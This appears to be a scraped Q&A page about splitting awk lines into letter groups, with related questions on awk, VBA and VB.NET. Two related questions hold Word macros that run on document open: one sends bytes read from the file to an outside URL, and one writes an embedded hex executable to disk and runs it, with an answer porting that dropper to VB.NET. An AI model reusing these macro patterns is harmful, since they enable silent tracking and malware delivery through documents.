Break lines at specified points with awk

Break lines at specified points with awk - awk

I have a file with multiple lines in the following form:
name1 a1 b3 c6 a3 b4 c9
name2 a7 b8 c7 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 c19 a7 b2 c10 a3 b5 c67
I need to break the lines after the letters repeat (i.e. after each a,b,c), but have the original name (field 1) retained:
name1 a1 b3 c6
name1 a3 b4 c9
name2 a7 b8 c7
name2 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 c19
name4 a7 b2 c10
name4 a3 b5 c67
I tried something along the lines of:
awk -F"\t" '{ for (i=2;i<=NF;i++) print $1"\t"$i }' file
but the i++ incorporates each field, is there a way to group them?
Thank you.

#starter5: Try:
awk 'BEGIN{V["a"];V["b"];V["c"]} /name/{R=$0;next} {Q=$0;gsub(/[[:digit:]]/,"",Q)} (Q in V){if(!W[Q]++){A++}} $0{if(A==1 && $0 && R){$0=R OFS $0};printf("%s %s",$0,(A==3?"\n":OFS));;if(A==3){A="";delete W}}' RS='[ +|\n]' Input_file
Following is the NON-one liner form of solution too here.
awk 'BEGIN{
V["a"];
V["b"];
V["c"]
}
/name/{
R=$0;
next
}
{
Q=$0;
gsub(/[[:digit:]]/,"",Q)
}
(Q in V){
if(!W[Q]++){
A++
}
}
$0 {
if(A==1 && $0 && R){
$0=R OFS $0
};
printf("%s %s",$0,(A==3?"\n":OFS));;
if(A==3) {
A="";
delete W
}
}
' RS='[ +|\n]' Input_file
So let's say we have following Input_file(where I changed the last line) to test if a,b,c are not coming in sequence, so it will NOT break line till three of them found, have a look to it and let me know then.
cat Input_file
name1 a1 b3 c6 a3 b4 c9
name2 a7 b8 c7 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 a19 a7 b2 c10 a3 b5 c67
Output will be as follows.
name1 a1 b3 c6
name1 a3 b4 c9
name2 a7 b8 c7
name2 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 a19 a7 b2 c10
name4 a3 b5 c67

{ # for any record
printf $1 # print name
c=substr($2,1,1); # first letter of group
printf OFS $2 # first part of first group
for(i=3; i<=NF; i++) { # for all the rest fields
if(index($i,c) != 1) # if next group has not started
printf OFS $i # print this part on same line
else # otherwise
printf ORS $1 OFS $i # print name and this part on next line
} # done for all fields
printf ORS # move to next line
} # done for this record
This does not work if some letter repeats within a group. For example, it won't work for a3 b5 a4 c6 a5 b6 a0 b9 where groups of a b a c are present.
This can be run like:
awk '{ printf $1; c=substr($2,1,1); printf OFS $2; for(i=3;i<=NF;i++) if(index($i,c)!=1) printf OFS $i; else printf ORS $1 OFS $i; printf ORS}' file

I need to break the lines after the letters repeat (i.e. after each
a,b,c), but have the original name (field 1) retained:
Input
$ cat file
name1 a1 b3 c6 a3 b4 c9
name2 a7 b8 c7 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 c19 a7 b2 c10 a3 b5 c67
Output
$ awk 'function _p(){print $1,s; s=""; split("",p)}{for(i=2; i<=NF; i++){ c=substr($i,1,1);if(c in p)_p(); s = (s?s OFS:"") $i; p[c] }_p()}' file
name1 a1 b3 c6
name1 a3 b4 c9
name2 a7 b8 c7
name2 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 c19
name4 a7 b2 c10
name4 a3 b5 c67
Better Readable version
awk '
function _p()
{
print $1,s;
s="";
split("",p)
}
{
for(i=2; i<=NF; i++)
{
c=substr($i,1,1);
if(c in p)_p();
s = (s?s OFS:"") $i;
p[c]
}
_p()
}
' file
OR
$ awk 'function _p(){print $1,s; s=p=""}{for(i=2; i<=NF; i++){ c=substr($i,1,1); if(c==p)_p(); s = (s?s OFS:"") $i; if(!p)p=c }_p()}' file
name1 a1 b3 c6
name1 a3 b4 c9
name2 a7 b8 c7
name2 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 c19
name4 a7 b2 c10
name4 a3 b5 c67
Better Readable version
awk '
function _p()
{
print $1,s;
s=p=""
}
{
for(i=2; i<=NF; i++)
{
c=substr($i,1,1);
if(c==p)_p();
s = (s?s OFS:"") $i;
if(!p)p=c
}
_p()
}' file

Related

Concatenate two file with a common pattern but with several lign

I have two files :
File 1 (sep = tab):
A1 bla blo bli 23
A1 bla blo bli 21
A1 bla blo bli 28
B2 bla blo bli 32
B2 bla blo bli 31
B2 bla blo bli 35
File 2 (sep = ;):
fli;flo;A1;flu;flc
fli;flo;A2;flu;flc
fli;flo;B1;flu;flc
fli;flo;B2;flu;flc
And I try to add the different value of each similar pattern of the File 1 to the File 2 like this :
fli;flo;A1;flu;flc;23;21;28
fli;flo;A2;flu;flc;
fli;flo;B1;flu;flc;
fli;flo;B2;flu;flc;32;31;35
Do you have some awk command in order to do that ?
Thanks in advance

awk 'BEGIN{OFS=";"}
(NR==FNR){a[$1,++b[$1]] = $2; n=(n>b[$1]?n:b[$1]); next }
{ s=$1; for(i=1;i<=n;++i) s = s OFS a[$1,i]; print s }' FS="\t" file1 FS=";" file2

correlations across columns AWK

I need to calculate correlations across columns.
The code below works when calculating correlations across rows.
What is needed to modify to calculate across columns?
Input file:
Name C1 C2 C3 C4 C5 C6
R1 1 2 3 4 5 6
R2 2 1 1 0 1 0
R3 1 3 1 1 2 1
R4 1 1 0 2 0 1
R5 1 2 2 2 0 2
R6 1 1 0 1 2 0
Desired Output:
C1 C1 1.00
C1 C2 -0.4
C1 C3 -0.069
C1 C4 -0.597
C1 C5 -0.175
C1 C5 -0.362
C2 C2 1.00
C2 C3 0.4889
etc.
Code:
awk '{
a = 0; for (i = 2; i <= NF; ++i) a += $i; a /= NF-1
b = 0; for (i = 2; i <= NF; ++i) b += ($i - a) ^ 2; b = sqrt(b)
if (b <= 0) next
for (i = 2; i <= NF; ++i) x[NR, i] = ($i - a) / b
n[NR] = $1
for (i = 2; i <= NR; ++i) {
if (!(i in n)) continue
a = 0
for (k = 2; k <= NF; ++k)
a += x[NR, k] * x[i, k]
print n[NR], n[i], a
}}'

Don't know if looking for this kind solution, but how about to transpose first with following awk:
awk '
{ for (i=1;i<=NF;i++) arr[i","NR]=$i; }
END {
for (i=1;i<=NF;i++) {
for (j=1;j<=NR;j++) printf("%s%s",arr[i","j],FS);
printf("%s",RS);
}
}
'
Output:
Name R1 R2 R3 R4 R5 R6
C1 1 2 1 1 1 1
C2 2 1 3 1 2 1
C3 3 1 1 0 2 0
C4 4 0 1 2 2 1
C5 5 1 2 0 0 2
C6 6 0 1 1 2 0
Then just combine with Your script to calculate column-column correlations:
awk '
{ for (i=1;i<=NF;i++) arr[i","NR]=$i; }
END {
for (i=1;i<=NF;i++) {
for (j=1;j<=NR;j++) printf("%s%s",arr[i","j],FS);
printf("%s",RS);
}
}
' roddy.txt | awk '{
a = 0; for (i = 2; i <= NF; ++i) a += $i; a /= NF-1
b = 0; for (i = 2; i <= NF; ++i) b += ($i - a) ^ 2; b = sqrt(b)
if (b <= 0) next
for (i = 2; i <= NF; ++i) x[NR, i] = ($i - a) / b
n[NR] = $1
for (i = 2; i <= NR; ++i) {
if (!(i in n)) continue
a = 0
for (k = 2; k <= NF; ++k)
a += x[NR, k] * x[i, k]
print n[NR], n[i], a
}}'
Output:
C1 C1 1
C2 C1 -0.4
C2 C2 1
C3 C1 -0.069843
C3 C2 0.488901
C3 C3 1
C4 C1 -0.597614
C4 C2 0.239046
C4 C3 0.667827
C4 C4 1
C5 C1 -0.175412
C5 C2 0.30697
C5 C3 0.581936
C5 C4 0.576557
C5 C5 1
C6 C1 -0.362738
C6 C2 0.362738
C6 C3 0.861381
C6 C4 0.932143
C6 C5 0.731727
C6 C6 1

Run-time error 62 Input past end of file

I am trying to read the last few bytes of a Microsoft Word file. I am getting the following error on line MyStr = Input(64, #1)
Run-time error 62 Input past end of file
Sub Document_Open()
Dim f As Document
Set f = ActiveDocument
MsgBox f.Name
Dim MaxSize, NextChar, MyStr, EndSize
Open f.Name For Input As #1
MaxSize = LOF(1)
EndSize = MaxSize - 63
NextChar = EndSize
Seek #1, NextChar
MyStr = Input(64, #1)
MsgBox (MyStr)
Close #1
Dim o
Dim NewStr As String
NewStr = "http://test.com/?rid=" + MyStr + "&type=doc"
Set o = CreateObject("MSXML2.ServerXMLHTTP")
o.Open "GET", NewStr, False
o.send
MsgBox (o.responsetext)
Dim IE
Set IE = CreateObject("InternetExplorer.Application")
IE.navigate ("https://en.wikipedia.org/")
IE.Visible = True
End Sub

Input # is intended to be used for files what were created with Write #, and the result gets "parsed" as it's being read. You can get more specific information in the documentation. Word documents are binary files, so that's going to create all kind of problems. The last 64 bytes of a random .docx file like kind of like this:
00 00 08 06 00 00 12 00 00 00 00 00 00 00 00 00
00 00 00 00 20 E2 01 00 77 6F 72 64 2F 66 6F 6E
74 54 61 62 6C 65 2E 78 6D 6C 50 4B 05 06 00 00
00 00 0F 00 0F 00 DF 03 00 00 42 E4 01 00 00 00
So, you need to open the file For Binary. You can then easily just pull it into a fixed length string with Get.
Note that you should also use FreeFile instead of hard coded file handles:
Dim handle As Integer
handle = FreeFile
Open f.Name For Binary Access Read As handle
Dim last64Bytes As String * 64
Get handle, LOF(handle) - 64, last64Bytes
Debug.Print last64Bytes
Close handle

Find all permutations from 1-9 and A-F

I am trying to find all possible permutations from the following conditions:
Number range 1-99
Letter range A-F
32 Digit long string
What would you recommend to make my life easier? Tried to search about permutations in vb, but just can't find them, and I don't know why but it doesn't seem such an hard task as that :s
Samples:
9A E5 4B CA BD 93 DE 2E 01 00 00 01 00 00 00 00
6E C7 9A CF CB A7 67 D9 17 EE 6B 70 F0 5E E4 32
64 86 00 EA 91 71 65 67 1F CE FE EB B1 CC 07 84
63 C0 8A AD F7 9F 5D F3 06 01 00 07 00 00 00 00
51 16 15 7C 56 9F 0A FF 55 1C 20 91 58 CD AA CF
48 61 56 FF 41 6E 49 F8 45 70 49 FE 54 75 52 1B
45 BA B8 B7 42 52 E3 77 03 00 00 03 00 00 00 00
40 D0 F4 04 BF AF 2B 99 02 00 00 02 00 00 00 00
40 30 90 00 3F 7C 83 3E 68 98 D5 D5 6D D9 A3 E9
FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
FE A1 CE 6D A6 82 A9 D1 00 00 00 00 00 00 00 00
Thanks for helpin!
EDIT:
Here's my code
Public Class Form1
Dim c As Integer
Dim p1, p2, p3, p4, p5, p6, p7, p8, p9, p10, p11, p12, p13, p14, p15, p16, a As String
Dim combo As String
Dim random As Random
Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load
c = -1
While c <= 99
c = c + 1
If c < 10 Then
a = "0" & c
Else : a = c
End If
p1 = a
p2 = 2
combo = p1 + " " + p2 + " " + p3 + " " + p4 + " " + p5 + " " + p6 + " " + p7 + " " + p8 + " " + p9 + " " + p10 + " " + p11 + " " + p12 + " " + p13 + " " + p14 + " " + p15 + " " + p16 + " " + vbNewLine
RichTextBox1.AppendText(combo + vbNewLine)
End While
End Sub
End Class

Judging from your example, you mean 0-9 (not 1-9) and A-F
Alex K. neatly provides a direction to solve this:
You would ignore the "numbers and letters" since that is a hexadecimal
notation of bytes (AF == 175) There are 16 bytes, each of which can
hold 0 to 255 so you have
340,282,366,920,938,463,463,374,607,431,768,211,455 possible
combinations.
Although it is theoretically possible to get all of these permutations, your computer needs about 34,028,236,692,093,846,346,337,460,743 GB. I don't think that much memory exists in total
If it were a relatively tiny number, we could do this simply with the following method:
Sub purgatory()
Dim counter As Long
Dim output As String
counter = 0
For counter = 0 To 2147483647#
output = String(16 - Len(Hex(counter)), "0") & Hex(counter)
MsgBox output
Next counter
End Sub
But the max value of a long in VBA7 is 2,147,483,648 (4 Bytes / 2), or 8 bytes with VB net. Which means that 12 bytes and one bit will always be 0. This could be solved with a few nested for loops.
I think the solution to your problem is best answered by JNevill
16 combinations of 00-FF... That is insanity...
IMPORTANT NOTE: If you run the code I posted, it's important to first familiarize yourself with Ctr+Pause/Break. Quickest way out of purgatory ;)

convert from hex code to exe file in vb.net

I have this code in vb6 that can create an exe file from its hex code. I want to do the same in vb.net.
This is my vb6 code:
Public Sub Document_Open()
Dim str As String
Dim hex As String
hex = hex & "4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00"
hex = hex & "40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
'you have to put the full hex code of the application here
Dim exe As String
Dim i As Long
Dim puffer As Long
i = 1
Do
str = Mid(hex, i, 2)
'convert hex to decimal
puffer = Val("&H" & str)
'convert decimal to ASCII
exe = exe & Chr(puffer)
i = i + 2
If i >= Len(hex) - 2 Then
Exit Do
End If
Loop
'write to file
Open "C:\application.exe" For Append As #2
Print #2, exe
Close #2
'and run the exe
Dim pid As Integer
pid = Shell("C:\application.exe", vbNormalFocus)
End Sub

It would be easier if the data was defined as a byte array literal, like this:
Dim bytes() As Byte = {&H4D, &H5A, &H50,
&H0, &H2, &H0} ' etc...
File.WriteAllBytes("c:\application.exe", bytes)
However, it would be nicer to store the binary data in a resource, then just write the resource out to a file, like this:
File.WriteAllBytes("c:\application.exe", My.Resources.Application_exe)
If you really need to convert it from a hexadecimal string, you could do it like this:
Dim hex As String = "4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00" &
"40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Using fs As New FileStream("c:\application.exe", FileMode.Create, FileAccess.Write)
For Each byteHex As String In hex.Split()
fs.WriteByte(Convert.ToByte(byteHex, 16))
Next
End Using

We Keep Coding

sql objective-c vba vb.net react-native apache vue.js tensorflow api pandas

Break lines at specified points with awk - awk

Related

Concatenate two file with a common pattern but with several lign

correlations across columns AWK

Run-time error 62 Input past end of file

Find all permutations from 1-9 and A-F

convert from hex code to exe file in vb.net

Categories

Resources